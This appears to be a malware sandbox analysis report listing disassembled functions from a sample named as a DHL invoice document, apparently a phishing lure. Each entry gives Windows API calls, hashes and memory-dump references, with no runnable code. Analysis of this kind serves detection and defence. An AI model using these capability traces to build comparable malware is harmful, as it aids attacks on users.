                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3488606520-0
                                                                                                                        • Opcode ID: 061843cfc38672f311a67a32301b2cae17436c713527b691337b5a5cf1aed5ea
                                                                                                                        • Instruction ID: 958960a49654da01ba0cf19cd4ffe243457c0b4a181f2a23d8ccf5cf024afa7a
                                                                                                                        • Opcode Fuzzy Hash: 061843cfc38672f311a67a32301b2cae17436c713527b691337b5a5cf1aed5ea
                                                                                                                        • Instruction Fuzzy Hash: 53A1B175604700AFD721DF24C886F2AB7E5AF84714F14881DF69A9F792DB70EC418B92
                                                                                                                        Function 0036BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,003D3700), ref: 0036BB91
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0040121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0036BC09
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00401270,000000FF,?,0000003F,00000000,?), ref: 0036BC36
                                                                                                                        • _free.LIBCMT ref: 0036BB7F
                                                                                                                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                                                                                                                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                                                                                                                        • _free.LIBCMT ref: 0036BD4B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1286116820-0
                                                                                                                        • Opcode ID: d63d2feb1da31bd470bae590e8b424b54cd276fa8d53352d583df0b25c74f9fd
                                                                                                                        • Instruction ID: 3c1fa9cb9c37e2ad0fc86afb405064e7a7cf991b02963623b79964e2eb46c018
                                                                                                                        • Opcode Fuzzy Hash: d63d2feb1da31bd470bae590e8b424b54cd276fa8d53352d583df0b25c74f9fd
                                                                                                                        • Instruction Fuzzy Hash: 15510A719002099FC712DF659D8196EF7BCEF41350F11826AE554EB2A9EB309E818F54
                                                                                                                        Function 0039E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0039CF22,?), ref: 0039DDFD
                                                                                                                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0039CF22,?), ref: 0039DE16
                                                                                                                          • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0039E473
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0039E4AC
                                                                                                                        • _wcslen.LIBCMT ref: 0039E5EB
                                                                                                                        • _wcslen.LIBCMT ref: 0039E603
                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0039E650
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3183298772-0
                                                                                                                        • Opcode ID: 9bd0c7a7012ceca85a29947a048989919245c98de6f62dea7f4562a40b2884bb
                                                                                                                        • Instruction ID: 9d367ade4dc69f27ab2a31053f0fda3f56ce9cde9a2addb7b77e17940341b2ce
                                                                                                                        • Opcode Fuzzy Hash: 9bd0c7a7012ceca85a29947a048989919245c98de6f62dea7f4562a40b2884bb
                                                                                                                        • Instruction Fuzzy Hash: 525141B24083459BCB26DB94D881EDFB3ECAF85340F00491EF589D7191EF74A688C766
                                                                                                                        Function 003BB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BBAA5
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BBB00
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003BBB63
                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 003BBBA6
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003BBBB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 826366716-0
                                                                                                                        • Opcode ID: 02e1527146212cedc308f5c71103d0455dff48c72067d180d041f49c20bf889a
                                                                                                                        • Instruction ID: 639a6c44f798f4a7b9ba16b7f86c721847dc988a41d0f04f78a9cd09de1b61a7
                                                                                                                        • Opcode Fuzzy Hash: 02e1527146212cedc308f5c71103d0455dff48c72067d180d041f49c20bf889a
                                                                                                                        • Instruction Fuzzy Hash: 8F61AD31608201EFD316DF14C890E6ABBE9FF84308F14859DF5998B6A2CB71ED45CB92
                                                                                                                        Function 00398BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00398BCD
                                                                                                                        • VariantClear.OLEAUT32 ref: 00398C3E
                                                                                                                        • VariantClear.OLEAUT32 ref: 00398C9D
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00398D10
                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00398D3B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4136290138-0
                                                                                                                        • Opcode ID: e3f905b0edbd4ad283616ab84f4229394e750e9ba2b3628608b3598fbb298a4d
                                                                                                                        • Instruction ID: 3c793f7b76a88bbc1dcc37bfbf5bc16f507c36b18f0a364cd25c84b83973ea36
                                                                                                                        • Opcode Fuzzy Hash: e3f905b0edbd4ad283616ab84f4229394e750e9ba2b3628608b3598fbb298a4d
                                                                                                                        • Instruction Fuzzy Hash: 5D5145B5A00619EFCB15CF68C894AAAB7F8FF89314B158559E909DB350E730E911CF90
                                                                                                                        Function 003A8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003A8BAE
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 003A8BDA
                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003A8C32
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003A8C57
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003A8C5F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2832842796-0
                                                                                                                        • Opcode ID: b7c58e4d433a93a86c5de60a1ad83a44abe7fef2e164a64725c2b35cd58113af
                                                                                                                        • Instruction ID: 06ddc51ca63aaa7d1a244079a263ef3db971b1cf23f2b551915469ba50e4e175
                                                                                                                        • Opcode Fuzzy Hash: b7c58e4d433a93a86c5de60a1ad83a44abe7fef2e164a64725c2b35cd58113af
                                                                                                                        • Instruction Fuzzy Hash: 46513975A00218AFDB16DF65C880A69BBF5FF49314F088458E849AF362CB31ED51CF90
                                                                                                                        Function 003B8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 003B8F40
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003B8FD0
                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 003B8FEC
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003B9032
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 003B9052
                                                                                                                          • Part of subcall function 0034F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,003A1043,?,7529E610), ref: 0034F6E6
                                                                                                                          • Part of subcall function 0034F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0038FA64,00000000,00000000,?,?,003A1043,?,7529E610,?,0038FA64), ref: 0034F70D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 666041331-0
                                                                                                                        • Opcode ID: b95c5d202aab83a0615b58e6c046f85666f09aca4b7d57fb984e86d8fe8cff8b
                                                                                                                        • Instruction ID: 8d24ec9d328099b3fb8ceb2b4a67339d96734158abd58912dd914a3146f0ae6f
                                                                                                                        • Opcode Fuzzy Hash: b95c5d202aab83a0615b58e6c046f85666f09aca4b7d57fb984e86d8fe8cff8b
                                                                                                                        • Instruction Fuzzy Hash: 17513935604205DFCB12EF54C4849ADBBB5FF49318F098099EA0A9F762DB31ED86CB90
                                                                                                                        Function 00362051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 3271823b89ac790d633a7020833bba8ff7b2b24a4ef7a6a358bb73500c9ac106
                                                                                                                        • Instruction ID: 0208b904a2b4c30c98fd4c8f48059fc68711eeb4312fa82ef1f96fbfa1c50f18
                                                                                                                        • Opcode Fuzzy Hash: 3271823b89ac790d633a7020833bba8ff7b2b24a4ef7a6a358bb73500c9ac106
                                                                                                                        • Instruction Fuzzy Hash: 3A41D032A006049FCB26DF78C980A6EB3E5EF89314F168568E915EF359DA31AD01CB80
                                                                                                                        Function 0034912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(?), ref: 00349141
                                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 0034915E
                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00349183
                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 0034919D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4210589936-0
                                                                                                                        • Opcode ID: 3806eac0f60b2f4424d89071eacc6eb72ee1e1358a216937e5f6a4ae3a001ee4
                                                                                                                        • Instruction ID: 135b0d91a3e15726c470ee0bfa678a4195f69533ae4d09773cd8ebce469a58de
                                                                                                                        • Opcode Fuzzy Hash: 3806eac0f60b2f4424d89071eacc6eb72ee1e1358a216937e5f6a4ae3a001ee4
                                                                                                                        • Instruction Fuzzy Hash: F341527190861AFBDF16AF64C848BEEB7B5FF05320F25825AE429A72D0C730AD54CB51
                                                                                                                        Function 003A3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetInputState.USER32 ref: 003A38CB
                                                                                                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 003A3922
                                                                                                                        • TranslateMessage.USER32(?), ref: 003A394B
                                                                                                                        • DispatchMessageW.USER32(?), ref: 003A3955
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A3966
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2256411358-0
                                                                                                                        • Opcode ID: 391786c9a6143e68382f5e94e4b6c3959ab7f765cc4dfcf1a3691d4a1d23e0a4
                                                                                                                        • Instruction ID: 666a6293832412970d8499ed08e0462e9a94d6a868f9a31a2c7e325f00925737
                                                                                                                        • Opcode Fuzzy Hash: 391786c9a6143e68382f5e94e4b6c3959ab7f765cc4dfcf1a3691d4a1d23e0a4
                                                                                                                        • Instruction Fuzzy Hash: D831A0719083429FEB27CB759948FB737ACEB07304F05456DF466D25A0E3B4AA89CB11
                                                                                                                        Function 003ACF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,003AC21E,00000000), ref: 003ACF38
                                                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 003ACF6F
                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFB4
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFC8
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFF2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3191363074-0
                                                                                                                        • Opcode ID: 45f2b8c8ce00e7122f0b934fbc9bf8cf9d9412436d00bea946736c9c491c9dc3
                                                                                                                        • Instruction ID: 5e23b4366e42983db05bd598aa1af3bc4662662d590d63b62fa4df687bc0e87d
                                                                                                                        • Opcode Fuzzy Hash: 45f2b8c8ce00e7122f0b934fbc9bf8cf9d9412436d00bea946736c9c491c9dc3
                                                                                                                        • Instruction Fuzzy Hash: DB318E71914205EFDB22DFA5C884EABBBFDEB16310F10542EF50AD6501DB30AE41DB60
                                                                                                                        Function 00391901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00391915
                                                                                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 003919C1
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 003919C9
                                                                                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 003919DA
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 003919E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3382505437-0
                                                                                                                        • Opcode ID: 0fe532a42445cca3cabe4278543c81d1830534ea5863eb2f52b3f38bb36059f7
                                                                                                                        • Instruction ID: 7e6f2beacb503c60fdb3e1b23c8f24ea926060246692ca022bec740be3998c4f
                                                                                                                        • Opcode Fuzzy Hash: 0fe532a42445cca3cabe4278543c81d1830534ea5863eb2f52b3f38bb36059f7
                                                                                                                        • Instruction Fuzzy Hash: B131AF71A0021AEFDF01CFA8C999ADE7BB5EB04315F114225F925E72D1C770A954CB90
                                                                                                                        Function 003C5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003C5745
                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 003C579D
                                                                                                                        • _wcslen.LIBCMT ref: 003C57AF
                                                                                                                        • _wcslen.LIBCMT ref: 003C57BA
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C5816
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 763830540-0
                                                                                                                        • Opcode ID: 88c7723a35b43749bff5f3c593315dcd1ddd9541207202f2ab5b65692bfaa595
                                                                                                                        • Instruction ID: 59d6bf9400f5be7a87caa2ca9d4c68463209ff108cd01660f3178b66abdf4558
                                                                                                                        • Opcode Fuzzy Hash: 88c7723a35b43749bff5f3c593315dcd1ddd9541207202f2ab5b65692bfaa595
                                                                                                                        • Instruction Fuzzy Hash: A52185719046189ADB229F61CC85FEEB7BCFF04725F10825AE919EA190D770ADC5CF50
                                                                                                                        Function 003B0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000000), ref: 003B0951
                                                                                                                        • GetForegroundWindow.USER32 ref: 003B0968
                                                                                                                        • GetDC.USER32(00000000), ref: 003B09A4
                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 003B09B0
                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 003B09E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4156661090-0
                                                                                                                        • Opcode ID: e05685d7c41ffe0a919fe64d40fd38850fc9764f7f6a694ef5a8f3b86a094904
                                                                                                                        • Instruction ID: 8b611ba720cb8ce722ed48e2b1b1f06dcee4bb072c2a6a9111b4aa8a433dd408
                                                                                                                        • Opcode Fuzzy Hash: e05685d7c41ffe0a919fe64d40fd38850fc9764f7f6a694ef5a8f3b86a094904
